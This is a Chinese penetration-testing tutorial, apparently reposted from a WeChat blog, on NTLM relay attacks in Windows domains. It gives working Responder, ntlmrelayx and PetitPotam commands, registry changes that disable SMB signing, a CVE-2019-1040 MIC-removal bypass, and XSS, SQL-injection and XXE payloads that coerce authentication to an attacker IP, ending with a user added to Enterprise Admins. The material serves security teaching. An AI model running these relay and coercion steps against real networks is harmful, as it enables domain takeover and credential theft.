【内网渗透基础】四、内网横向-NTLM中继攻击

admin 2025年6月26日00:46:04评论0 views字数 3122阅读10分24秒阅读模式
免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不承担任何法律及连带责任。
简介 ]
——————————————————————
天上尘,地下土。你选择什么样的方式,就会拥有什么样的人生。真正的优秀不是别人逼出来的,而是自己和自己死磕
摘自真正的优秀,都是自找的】 
——————————————————————

NTLM中继

本文主要讲解内网横向中NTLM中继的利用。NTLM是"NTLAN Manager"的缩写,是一种基于挑战应答的网络认证方式,在设计之初并没有规定NTLM的传输协议是什么,在实际的认证中SMBLDAPHTTPMSSQL都可以作为其传输协议。这里需要介绍下NTLM HashNet -NTLM Hash的区别

NTLM Hash存储在本地计算机的安全账户管理器 (SAM) 数据库或域控制器的 NTDS.dit 文件中的用户密码Hash值

Net-NTLM HashNTLM认证过程中客户端本地用户密码的Hash对服务端返回的challenge加密后返回给服务器用于验证的Response,这类Hash一般用于碰撞,在 Relay Attack攻击使用的正是这类Hash

目录
NTLM中继
    一、NTLM中继原理
    二、中继攻击
 2.1SMB中继
2.2 ldap中继

漏洞信息

混子Hacker     

01

NTLM中继原理

在NTLM认证过程中没有对双方身份进行认证,也就是可以存在一个中间人在客户端和服务器直接进行转发Relay(重放),从而客户端的Net-NTLM Hash并将其进行Relay(重放)到服务器从而完成认证。

NTLM认证流程

【内网渗透基础】四、内网横向-NTLM中继攻击

Step 1:客户端向服务器发送用户名登录请求

Step 2:Type2 message(challenge):服务器接受请求之后查看SAM数据库是否存在用户Hash,存在的话生成一个challenge发送给客户端,并将challenge与Hash一起加密存储在本地

Step 3:Type3 message(authentication):客户端收到challenge之后将自己的密码Hash与challenge一起进行加密之后发送给服务器,服务器收到加密的数据之后与本地存储的加密信息进行对比是否相同

混子Hacker

02

中继攻击

2.1 SMB中继
环境:
【内网渗透基础】四、内网横向-NTLM中继攻击
前置条件:中继的服务器需要关闭SMB签名
查看是否开启签名
可以使用nmap查看SMB签名是否关闭
nmap -n -p445 ip --script=smb-security-mod
如下表示required开启了签名,显示disabled表示关闭
【内网渗透基础】四、内网横向-NTLM中继攻击
或抓包查看signing enabled字段
【内网渗透基础】四、内网横向-NTLM中继攻击
关闭SMB签名
PS:自己测试的过程中可通过注册表
路径:HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanWorkstationParameters。RequireSecuritySignature → 值设为0(禁用签名要求)EnableSecuritySignature → 值设为0(禁用签名)执行后需‌重启SMB服务‌生效:Restart-Service LanmanServer -ForceRestart-Service LanmanWorkstation -Force
【内网渗透基础】四、内网横向-NTLM中继攻击
【内网渗透基础】四、内网横向-NTLM中继攻击
运行Responder
设置smb和http为Off
编辑Responder.conf文件,设置smb和http为Off
【内网渗透基础】四、内网横向-NTLM中继攻击
获取凭据
kali上运行Responder开启监听
【内网渗透基础】四、内网横向-NTLM中继攻击
重放凭据
利用ntlmrelayx.py重放凭据并执行命令
ntlmrelayx.py -t 受害者ip -c whoami -smb2support
【内网渗透基础】四、内网横向-NTLM中继攻击
触发凭据
方法:
1、访问不存在的SMB共享地址(类似ARP欺骗):此时会广播询问,攻击机会响应说自己就是这个地址
【内网渗透基础】四、内网横向-NTLM中继攻击
2、系统图标:在文件夹属性中修改图标地址为攻击机地址
【内网渗透基础】四、内网横向-NTLM中继攻击
3、scf文件:scf文件包含了IconFile属性,资源管理器会尝试通过scf文件获取文件的图标
【内网渗透基础】四、内网横向-NTLM中继攻击
4、构造PDF:PDF规范允许为GoTobe和GoToR条目加载远程内容,PDF文件可以添加一项功能,请求远程SMB服务器的文件。使用脚本https://github.com/3gstudent/Worse-PDF,修改
【内网渗透基础】四、内网横向-NTLM中继攻击
5、还可以使用web漏洞如xss、xxe、sql注入、文件包含等等
xss:<imgsrc="\\ip\hunzihacker"onerror=alert(1)>sql注入:select 1,(load_file('\\ip\hunzihacker')),3xxe:<?xmlversion="1.0" encoding="ISO-8859-1"?><!DOCTYPE root [<!ENTITY hunzihackerSYSTEM"php://filter/convert.base64-encode/resource=//ip/hunzihacker" >]><root><name></name><tel></tel><email>&hunzihacker;</email><password></password></root>
这里使用第一种方法
在serv 2008(192.168.232.133)上访问不存在的路径
【内网渗透基础】四、内网横向-NTLM中继攻击
成功在域内主机(192.168.232.132)上执行命令
【内网渗透基础】四、内网横向-NTLM中继攻击
2.2 LDAP中继

需要关闭ldap签名。默认情况下,ldap服务器就在域控里面,而且默认策略就是协商签名。而不是强制签名,客户端分情况,如果是smb协议的话,默认要求签名的,如果是webadv或者http协议,是不要求签名的。

然而客户端发起使用SMB协议默认是要求签名的

如果直接修改标志位会导致MIC(消息完整性检查)

此时需要结合CVE-2019-1040进行绕过,将SMB Relay到LDAP

启动ntlmrelayx,指定LDAP为攻击目标(-t ldap://域控IP)

ntlmrelayx.py -t ldap://192.168.1.10 --remove-mic# 参数解释:# -t ldap://192.168.1.10     : 中继目标为域控的LDAP服务# --remove-mic               : 移除MIC标志(绕过某些签名检查)
成功将user4用户添加到企业管理组里面了,这里是通过SMB协议进行触发的,中继到了Ldap协议。这里中继的是ldap,ldaps也是可以的,这里的ip是210,因为只有域控有Ldap服务。【内网渗透基础】四、内网横向-NTLM中继攻击
python3 PetitPotam.py -d god.org -u hunzihacker -p Admin@123 kali-ip AD-ip
如下图可以看到user4已经是企业管理组的成员了。【内网渗透基础】四、内网横向-NTLM中继攻击
本专栏往期文章:

【内网渗透基础】一、信息收集

【内网渗透基础】二、隧道建立

【内网渗透基础】二、隧道建立(下)

【内网渗透基础】三、权限提升-Windows内核提权

【内网渗透基础】三、权限提升-Windows内核提权(下)

【内网渗透基础】三、权限提升-Windows第三方软件提权

【内网渗透基础】三、权限提升-Linux提权

【内网渗透基础】四、内网横向-主机凭据获取

【内网渗透基础】四、内网横向-IPC横向

【内网渗透基础】四、内网横向-凭证传递攻击

【内网渗透基础】四、内网横向-委派攻击

<<<  END >>>

原创文章|转载请附上原文出处链接

更多漏洞|关注作者查看

作者|混子Hacker

原文始发于微信公众号(混子Hacker):【内网渗透基础】四、内网横向-NTLM中继攻击

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月26日00:46:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【内网渗透基础】四、内网横向-NTLM中继攻击http://cn-sec.com/archives/4168662.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息